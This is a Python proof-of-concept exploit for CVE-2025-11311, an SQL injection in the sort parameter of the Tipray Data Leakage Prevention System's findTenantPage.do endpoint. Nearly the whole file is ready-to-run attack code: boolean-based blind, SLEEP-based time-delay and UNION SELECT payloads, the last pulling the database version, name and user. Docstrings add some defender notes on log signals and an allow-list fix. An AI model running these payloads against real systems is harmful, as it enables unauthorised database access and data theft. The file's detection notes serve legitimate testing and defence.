# CVE-2025-11311 PoC - SQL Injection in Tipray DLP System
# Vulnerability: SQL Injection via sort parameter in findTenantPage.do
# Affected: Tipray Data Leakage Prevention System v1.0
import requests
# Base URL of the host under test. "target-host" is a placeholder the
# operator is expected to replace; nothing below validates scheme or port.
target_url = "http://target-host:8080"
# Paged tenant-listing endpoint whose ``sort`` query parameter is the
# subject of every probe in this file.
endpoint = "/findTenantPage.do"
# Normal request to verify the endpoint is accessible
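def check_endpoint() -> bool:
    """Send a benign paged request to the tenant listing endpoint.

    Issues a single GET against ``findTenantPage.do`` with a plain
    ``sort=id`` value (no injection) so the operator can confirm the host
    is reachable before any probe runs. In an access log this request is
    indistinguishable from a normal first-page listing.

    Returns:
        bool: True only when the server answered HTTP 200; False on any
        other status or on a transport-level failure.
    """
    url = f"{target_url}{endpoint}"
    params = {
        "page": "1",
        "limit": "10",
        "sort": "id",
    }
    try:
        resp = requests.get(url, params=params, timeout=10)
    except requests.RequestException as e:
        # Only client/transport failures are expected here; a bare
        # ``except Exception`` would also mask programming errors in
        # this script, so the catch is narrowed to the requests hierarchy.
        print(f"[-] Connection error: {e}")
        return False
    print(f"[+] Endpoint status: {resp.status_code}")
    return resp.status_code == 200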
# Boolean-based blind SQL injection via sort parameter
def exploit_blind_injection() -> bool:
    """Boolean-based blind probe of the ``sort`` parameter.

    Sends two requests whose ``sort`` values differ only in a CASE
    condition (``1=1`` vs ``1=2``) and compares status code and body. A
    difference is taken as evidence that the value reached an ORDER BY
    clause without sanitisation.

    Defender notes: both requests carry SQL keywords (``CASE WHEN``,
    ``SELECT``, ``UNION``) inside a parameter that should only ever hold a
    column name, so a WAF or access-log rule that matches those tokens in
    ``sort`` will flag this probe. The server-side fix is to resolve
    ``sort`` through an allow-list of column names instead of
    interpolating the raw value into the query.

    Returns:
        bool: True when the two responses differ, False when they match or
        when a request fails.
    """
    url = f"{target_url}{endpoint}"
    # Inject ORDER BY clause with CASE WHEN for boolean-based blind injection
    payload = "id,(CASE WHEN (1=1) THEN id ELSE (SELECT 1 UNION SELECT 2) END)"
    params = {
        "page": "1",
        "limit": "10",
        "sort": payload
    }
    try:
        resp_true = requests.get(url, params=params, timeout=10)
        payload_false = "id,(CASE WHEN (1=2) THEN id ELSE (SELECT 1 UNION SELECT 2) END)"
        params["sort"] = payload_false
        resp_false = requests.get(url, params=params, timeout=10)
        # Any divergence in status or body counts as a positive. Dynamic
        # content in the body (timestamps, request ids) would also trip
        # this comparison, so a hit here is not conclusive on its own.
        if resp_true.status_code != resp_false.status_code or resp_true.text != resp_false.text:
            print("[+] Target is vulnerable to SQL injection!")
            return True
        else:
            print("[-] Target may not be vulnerable")
            return False
    except Exception as e:  # NOTE(review): broad catch also hides programming errors
        print(f"[-] Exploit error: {e}")
        return False
# Time-based blind SQL injection
def exploit_time_based() -> bool:
    """Time-based blind probe of the ``sort`` parameter.

    Sends one request whose ``sort`` value contains ``IF(1=1,SLEEP(5),0)``
    and treats a round trip of five seconds or more as a positive.

    Defender notes: ``SLEEP(`` in a query parameter is a high-signal
    indicator for log review, and a sudden 5 s latency spike on this
    endpoint is a second one. No baseline latency is measured, so a slow
    link or a busy server can also cross the threshold; this result alone
    is not conclusive.

    Returns:
        bool: True when ``resp.elapsed`` is at least 5 s, False otherwise
        or when the request fails (including the 15 s client timeout).
    """
    url = f"{target_url}{endpoint}"
    # Using IF/SLEEP for time-based detection
    payload = "id,IF(1=1,SLEEP(5),0)"
    params = {
        "page": "1",
        "limit": "10",
        "sort": payload
    }
    try:
        # Client timeout is 15 s so a 5 s server-side delay is not cut off.
        resp = requests.get(url, params=params, timeout=15)
        if resp.elapsed.total_seconds() >= 5:
            print("[+] Time-based SQL injection confirmed!")
            return True
        else:
            print("[-] Time-based injection not detected")
            return False
    except Exception as e:  # NOTE(review): broad catch also hides programming errors
        print(f"[-] Time-based exploit error: {e}")
        return False
# UNION-based SQL injection to extract data
def exploit_union_injection() -> bool | None:
    """UNION-based probe that looks for a DBMS name in the response body.

    Sends a ``sort`` value ending in ``UNION SELECT ...`` with ten columns,
    including ``version()``, ``database()`` and ``user()``, and reports
    success when the body contains "MySQL", "Oracle" or "PostgreSQL".

    Defender notes: this is the noisiest of the three probes. ``UNION
    SELECT`` and a trailing ``--`` in the ``sort`` parameter are
    straightforward to match in logs or a WAF, and a successful query would
    presumably surface DBMS metadata in a listing that should only contain
    tenant rows. Returning a generic error page instead of raw query output
    blunts this class of probe; an allow-listed ``sort`` removes it.

    Returns:
        bool | None: True on a marker match; False when the request fails.
        When the request succeeds but no marker is found the function
        falls off the end and returns None — NOTE(review): inconsistent
        with the other probes, which print a negative result and return
        an explicit False.
    """
    url = f"{target_url}{endpoint}"
    # Attempt UNION-based injection to extract database version
    payload = "1 UNION SELECT 1,version(),database(),user(),5,6,7,8,9,10--"
    params = {
        "page": "1",
        "limit": "10",
        "sort": payload
    }
    try:
        resp = requests.get(url, params=params, timeout=10)
        if resp.status_code == 200 and ("MySQL" in resp.text or "Oracle" in resp.text or "PostgreSQL" in resp.text):
            print("[+] UNION injection successful!")
            # Only the first 500 characters are echoed to keep output bounded.
            print(f"[+] Response: {resp.text[:500]}")
            return True
    except Exception as e:  # NOTE(review): broad catch also hides programming errors
        print(f"[-] UNION exploit error: {e}")
        return False
if __name__ == "__main__":
    # Print the banner, gate on reachability, then run the three probes in
    # order; each probe is announced with its own status line first.
    print("[*] CVE-2025-11311 - Tipray DLP SQL Injection PoC")
    print("[*] Checking target...")
    if check_endpoint():
        probes = (
            ("[*] Attempting blind injection...", exploit_blind_injection),
            ("[*] Attempting time-based injection...", exploit_time_based),
            ("[*] Attempting UNION injection...", exploit_union_injection),
        )
        for banner, probe in probes:
            print(banner)
            probe()